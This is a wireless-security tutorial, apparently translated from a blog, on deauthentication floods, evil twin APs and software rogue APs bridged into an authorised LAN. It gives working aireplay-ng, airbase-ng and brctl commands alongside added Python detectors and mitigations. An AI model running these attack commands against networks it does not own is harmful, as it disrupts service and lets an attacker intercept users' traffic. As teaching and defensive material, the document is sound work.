Attacking WLAN infrastructure

Cracking the AP's default account

The admin web page of some routers uses a default account and password such as admin or 123456.

Even when that is not the case, the login password is usually fairly simple; by capturing and analysing the login traffic on the network, one can write code to brute-force it.
Simulated login test against the login page of a FAST (迅捷) home router

Denial-of-service attack

aireplay-ng -0 -a ap_mac -c victim_mac wlan0mon
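The deauthentication flood above is visible to anyone monitoring the channel: a legitimate AP deauthenticates a client occasionally, not dozens of times per second. The following detector is an added example written for this page (it is not part of the original post and is not aircrack-ng code). It works on a list of management-frame records; the records here are constructed, and in practice they would be parsed out of a capture taken on a monitor-mode interface.

```python
"""Detect 802.11 deauthentication/disassociation floods.

Added example, not from the original post. Frame records are
(timestamp_seconds, frame_subtype, src_mac, dst_mac, bssid) tuples ordered
by timestamp; the sample below is constructed, not captured.
"""
from collections import defaultdict, deque

DEAUTH = 0xC    # management-frame subtype 12 = deauthentication
DISASSOC = 0xA  # management-frame subtype 10 = disassociation
BEACON = 0x8    # subtype 8 = beacon (benign background traffic)


def detect_deauth_flood(frames, window=10.0, threshold=20):
    """Return a list of (bssid, window_start, count) alerts.

    One alert is raised per BSSID when more than `threshold` deauth/disassoc
    frames are seen for it within `window` seconds; the alert is re-armed
    once the rate drops back below the threshold.
    """
    recent = defaultdict(deque)   # bssid -> timestamps inside the window
    in_alert = set()
    alerts = []
    for ts, subtype, src, dst, bssid in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that left the window
            q.popleft()
        if len(q) > threshold:
            if bssid not in in_alert:
                in_alert.add(bssid)
                alerts.append((bssid, q[0], len(q)))
        else:
            in_alert.discard(bssid)
    return alerts


def constructed_sample():
    """Constructed frame stream: sparse benign deauths, then a burst."""
    ap = "00:11:22:33:44:55"        # constructed BSSID
    client = "AA:BB:CC:DD:EE:01"    # constructed client MAC
    frames = []
    # Benign background: one deauth every 30 s (idle timeouts, roaming).
    for i in range(4):
        frames.append((i * 30.0, DEAUTH, ap, client, ap))
    # Burst: 40 deauths claiming to come from the AP within 2 s, the
    # pattern a tool like aireplay-ng -0 produces.
    for i in range(40):
        frames.append((120.0 + i * 0.05, DEAUTH, ap, client, ap))
    frames.append((125.0, BEACON, ap, "FF:FF:FF:FF:FF:FF", ap))
    return frames


if __name__ == "__main__":
    for bssid, start, count in detect_deauth_flood(constructed_sample()):
        print(f"deauth flood from {bssid}: {count} frames since t={start:.2f}s")
```

The background deauths never accumulate inside a 10 s window, so only the burst produces an alert, and it fires on the 21st frame of the burst. Since the attacker spoofs the AP's MAC, the source address is no help in attribution; the rate per BSSID is the signal, and 802.11w (Protected Management Frames) is the mitigation that makes spoofed deauth frames ineffective in the first place.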

Evil twin and AP MAC address spoofing attacks

Evil twin (cloned AP) attack: deploy an attacker-controlled AP near the targeted WLAN with the same SSID, BSSID, channel and frequency as the legitimate one.

root@yue:~# airbase-ng --help

  Airbase-ng 1.5.2  - (C) 2008-2018 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)
      -n hex           : User specified ANonce when doing the 4-way handshake

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen

root@yue:~# airbase-ng -a  C8:3A:35:A7:A6:50 --essid Tenda_A7A650 -c 13 wlan1mon
21:45:12  Created tap interface at0
21:45:12  Trying to set MTU on at0 to 1500
21:45:12  Access Point with BSSID C8:3A:35:A7:A6:50 started.

Rogue AP

An AP that connects, without authorisation, to a network that requires authorisation to access.

In the vast majority of cases, a rogue AP is configured with open authentication and no encryption enabled.

Deploying a rogue AP

  • Deploy an actual physical device inside the authorised network as the rogue AP. -> This compromises not only the wireless security but also the physical security of the authorised network.
  • Create the rogue AP in software and bridge it to the local Ethernet segment of the authorised network.

Building a rogue AP in software

  1. Build the AP with the airbase-ng tool
root@yue:~# airbase-ng -a AB:CD:EF:12:34:56 --essid ap_test -c 10 wlan1mon
16:32:23  Created tap interface at0
16:32:23  Trying to set MTU on at0 to 1500
16:32:23  Trying to set MTU on wlan1mon to 1800

ti_set_mac failed: Cannot assign requested address
You most probably want to set the MAC of your TAP interface.
ifconfig <iface> hw ether AB:CD:EF:12:34:56


16:32:23  Access Point with BSSID AB:CD:EF:12:34:56 started.

  2. Bridge the Ethernet interface that belongs to the authorised network to the rogue AP's interface. On Kali Linux, install bridge-utils and create the network interface wifi_bridge:
root@yue:~# brctl addbr wifi_bridge
root@yue:~# iwconfig
wifi_bridge  no wireless extensions.

at0       no wireless extensions.

eth0      no wireless extensions.

wlan1mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
  3. Bridge the Ethernet interface and the virtual interface at0 created by airbase-ng
root@yue:~# brctl addif wifi_bridge eth0
root@yue:~# brctl addif wifi_bridge at0
  4. Bring up the at0 and wifi_bridge interfaces
root@yue:~# ifconfig eth0 0.0.0.0 up
root@yue:~# ifconfig at0 0.0.0.0 up
  5. Enable IP forwarding
root@yue:~# echo 1 > /proc/sys/net/ipv4/ip_forward

okay…

Bring up the bridge

root@yue:~# ifconfig wifi_bridge up

Wireless clients that connect to the rogue AP will receive IP addresses from the DHCP server inside the authorised WLAN.
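Both the evil twin section above and this rogue AP procedure leave traces in the beacon frames a wireless sensor can see: an authorised SSID advertised by a BSSID the organisation does not own, an authorised BSSID appearing on the wrong channel or with different security settings, or an unknown open AP (the usual rogue-AP shape). The audit below is an added example written for this page, not code from the original post or from aircrack-ng. The authorised-AP inventory and the scan observations are constructed; a real deployment would feed it the ESSID/BSSID/channel/privacy fields from a scanner such as airodump-ng.

```python
"""Beacon-level audit for evil twin and rogue AP indicators.

Added example, not from the original post. AUTHORISED and
constructed_scan() are constructed data, not a real site inventory.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    essid: str
    bssid: str
    channel: int
    privacy: str   # "OPN", "WEP", "WPA", "WPA2", ...


# Constructed inventory: BSSID -> (ESSID, channel, privacy) the organisation operates.
AUTHORISED = {
    "00:11:22:33:44:55": ("corp-wifi", 6, "WPA2"),
}


def audit(observations, authorised):
    """Return a list of (kind, observation) findings.

    kind is one of:
      bssid-clone    : an authorised BSSID seen with a different ESSID,
                       channel or privacy than the inventory records
      evil-twin-ssid : an authorised ESSID advertised by a BSSID we do not own
      rogue-open-ap  : an unknown AP running with no encryption
    Unknown encrypted APs (neighbours) are not reported.
    """
    authorised = {b.upper(): v for b, v in authorised.items()}
    authorised_essids = {essid for essid, _, _ in authorised.values()}
    findings = []
    for obs in observations:
        bssid = obs.bssid.upper()
        if bssid in authorised:
            essid, chan, priv = authorised[bssid]
            if (obs.essid, obs.channel, obs.privacy) != (essid, chan, priv):
                findings.append(("bssid-clone", obs))
        elif obs.essid in authorised_essids:
            findings.append(("evil-twin-ssid", obs))
        elif obs.privacy == "OPN":
            findings.append(("rogue-open-ap", obs))
    return findings


def constructed_scan():
    """Constructed scan results covering each case the audit distinguishes."""
    return [
        Observation("corp-wifi", "00:11:22:33:44:55", 6, "WPA2"),      # legitimate AP
        Observation("corp-wifi", "00:11:22:33:44:55", 11, "WPA2"),     # our BSSID, wrong channel
        Observation("corp-wifi", "AB:CD:EF:12:34:56", 6, "WPA2"),      # our SSID, foreign BSSID
        Observation("ap_test", "AB:CD:EF:12:34:57", 10, "OPN"),        # unknown open AP
        Observation("neighbour-net", "66:77:88:99:AA:BB", 1, "WPA2"),  # neighbour, ignored
    ]


if __name__ == "__main__":
    for kind, obs in audit(constructed_scan(), AUTHORISED):
        print(f"{kind:15} essid={obs.essid} bssid={obs.bssid} ch={obs.channel} {obs.privacy}")
```

The limits of this check are worth stating. An evil twin that clones all four fields (SSID, BSSID, channel, privacy) is indistinguishable at the beacon level; distinguishing it then relies on signal-strength and location fingerprinting by multiple sensors, on clients validating the RADIUS server certificate for 802.1X networks, and on Protected Management Frames blunting the deauth that usually accompanies the attack. The software rogue AP bridged to eth0 is also visible from the wired side: 802.1X or port security on the switch port, and alerting on unexpected MAC addresses appearing behind a port, catch the bridge regardless of what it advertises over the air.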
